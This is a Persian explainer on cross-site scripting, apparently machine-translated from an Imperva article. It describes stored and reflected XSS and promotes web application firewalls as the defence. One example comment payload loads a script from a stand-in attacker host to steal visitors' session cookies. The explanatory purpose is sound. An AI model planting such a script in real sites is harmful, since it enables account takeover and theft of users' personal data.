Hoonarjo 2.jpgس 750x480 - حمله به اسکریپت نویسی سایت (XSS)

حمله به اسکریپت نویسی سایت (XSS)

اسکریپت نویسی سایت متقاطع (XSS) چیست؟

اسکریپت نویسی یا برنامه نویسی (Cross Site XSS) یک بردار حمله متداول است که کدهای مخرب را به یک برنامه وب آسیب پذیر تزریق می کند. XSS با سایر بردارهای حمله وب (مانند تزریق SQL) متفاوت است ، به این دلیل که مستقیماً برنامه مورد نظر خود را هدف قرار نمی دهد. درعوض ، کاربران برنامه وب کسانی هستند که در معرض خطر هستند.

یک حمله موفقیت آمیز در زمینه نگارش در سایت ، می تواند عواقب مخربی برای شهرت یک کسب و کار آنلاین و ارتباط آن با مشتریان خود داشته باشد.

بسته به شدت حمله ، ممکن است حسابهای کاربر به خطر بیفتد ، برنامه اسب Trojan فعال شود و محتوای صفحه تغییر یابد ، کاربران را گمراه می کند تا با اراده شخصی اطلاعات شخصی خود را تسلیم کنند. سرانجام ، کوکی های جلسه می توانند فاش شوند و به یک عامل متهم می شود تا کاربران معتبر را جعل کند و از حساب های خصوصی خود سوء استفاده کند.

بیشتربخوانید >>‌ سرور Origin چیست؟ 

حملات اسکریپت کراس سایت می تواند به دو نوع تقسیم شود: ذخیره شده و منعکس شده.

ذخیره شده XSS ، همچنین به عنوان XSS مداوم شناخته می شود ، آسیب بیشتری به این دو می زند. این اتفاق می افتد وقتی یک اسکریپت مخرب مستقیماً به یک برنامه وب آسیب پذیر تزریق می شود.

بازتاب XSS شامل بازتاب یک اسکریپت مخرب از یک برنامه وب ، بر روی مرورگر کاربر است. اسکریپت در یک پیوند تعبیه شده است و فقط پس از کلیک بر روی این لینک فعال می شود.

برنامه نویسی متقاطع ذخیره شده چیست؟ 

برنامه نویسی متقاطع ذخیره شده چیست؟ 

برای انجام موفقیت آمیز یک حمله ذخیره شده XSS ، یک مرتکب مجبور است یک آسیب پذیری را در یک برنامه وب پیدا کند و سپس اسکریپت های مخرب را به سرور خود تزریق کند (به عنوان مثال ، از طریق یک قسمت نظر).

یکی از هدفهای متداول وب سایتهایی هستند که به کاربران امکان اشتراک گذاری مطالب را از جمله وبلاگ ها ، شبکه های اجتماعی ، سیستم عامل های اشتراک گذاری ویدیو و تابلوهای پیام را می دهد. هر بار که صفحه آلوده مشاهده می شود ، اسکریپت مخرب به مرورگر قربانی منتقل می شود.

به عنوان مثال حمله ذخیره شده XSS

مرتکب هنگام مرور یک وب سایت تجارت الکترونیکی ، یک آسیب پذیری را کشف می کند که باعث می شود برچسب های HTML در بخش نظرات سایت تعبیه شوند. برچسب های تعبیه شده به یک ویژگی دائمی صفحه تبدیل می شوند و باعث می شوند مرورگر هر بار که صفحه باز می شود ، آنها را با بقیه منبع منبع تجزیه کند.

مهاجم نظر زیر را اضافه می کند: قیمت عالی برای کالای عالی! نقد و بررسی من را اینجا بخوانید src \u003d ‘http://hackersite.com/authstealer.js’ / اسکریپت.

از این نقطه به بعد ، هر بار که به این صفحه دسترسی پیدا کنید ، برچسب HTML موجود در نظر ، پرونده JavaScript را که در یک سایت دیگر میزبانی شده است ، فعال می کند و این قابلیت را دارد که کوکی های جلسه بازدید کنندگان را سرقت کند.

.jpg - حمله به اسکریپت نویسی سایت (XSS)

با استفاده از کوکی جلسه ، مهاجم می تواند حساب بازدید کننده را به خطر بیاندازد و به وی دسترسی آسان به اطلاعات شخصی و اطلاعات کارت اعتباری خود را بدهد. در همین حال ، بازدید کننده ، که ممکن است هرگز حتی به بخش نظرات پایین نوردد ، آگاهی ندارد که این حمله رخ داده است.

برخلاف حمله منعکس شده ، در جایی که فیلمنامه پس از کلیک روی یک لینک فعال می شود ، حمله ذخیره شده فقط نیاز دارد که قربانی از صفحه وب به خطر بیافتد. این میزان دسترسی را افزایش می دهد و همه بازدید کنندگان را بدون توجه به سطح هوشیاری آنها به خطر می اندازد.

از نظر مرتکب ، حملات مداوم XSS به دلیل مشکل در یافتن وب سایت قاچاق شده و آسیب پذیری هایی که امکان تعبیه اسکریپت دائمی را دارند ، انجام نسبتاً سخت تر است.

پیشگیری / کاهش حمله XSS ذخیره شده

.jpg - حمله به اسکریپت نویسی سایت (XSS)

فایروال برنامه وب (WAF) متداول ترین راه حل برای محافظت در برابر حملات XSS و برنامه های وب است.

WAF ها از روشهای مختلفی برای مقابله با بردارهای حمله استفاده می کنند. در مورد XSS ، بیشتر برای شناسایی و مسدود کردن درخواست های مخرب به فیلترهای مبتنی بر امضا متکی هستند.

مطابق با بهترین شیوه های صنعت ، فایروال برنامه وب ابری Imperva از فیلتر امضا نیز برای مقابله با حملات اسکریپت کراس سایت استفاده می کند.

Imperva cloud WAF به عنوان یک سرویس مدیریت شده ارائه می شود ، که به طور مرتب توسط تیمی از کارشناسان امنیتی که دائماً قانون امنیتی را با امضاهای بردارهای حمله تازه کشف شده به روز می کنند ، ارائه می شود.

فن آوری کلاچینگ Imperva بطور خودکار داده ها را از طریق شبکه خود جمع می کند و به سود کلیه مشتریان حمله می کند.

رویکرد شلوغی ، پاسخ سریع را به تهدیدات روز صفر می دهد ، و به محض شناسایی یک حمله تک ، تمام جامعه کاربران را در برابر هرگونه تهدید جدید محافظت می کند.

Crowdsourcing همچنین استفاده از سیستم شهرت IP را امکان پذیر می کند که متخلفین مکرر ، از جمله منابع بات نت را که مجدداً توسط مجرمین متعدد مورد استفاده مجدد قرار می گیرند ، مسدود می کند.

منبع

نوشتن نظر

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *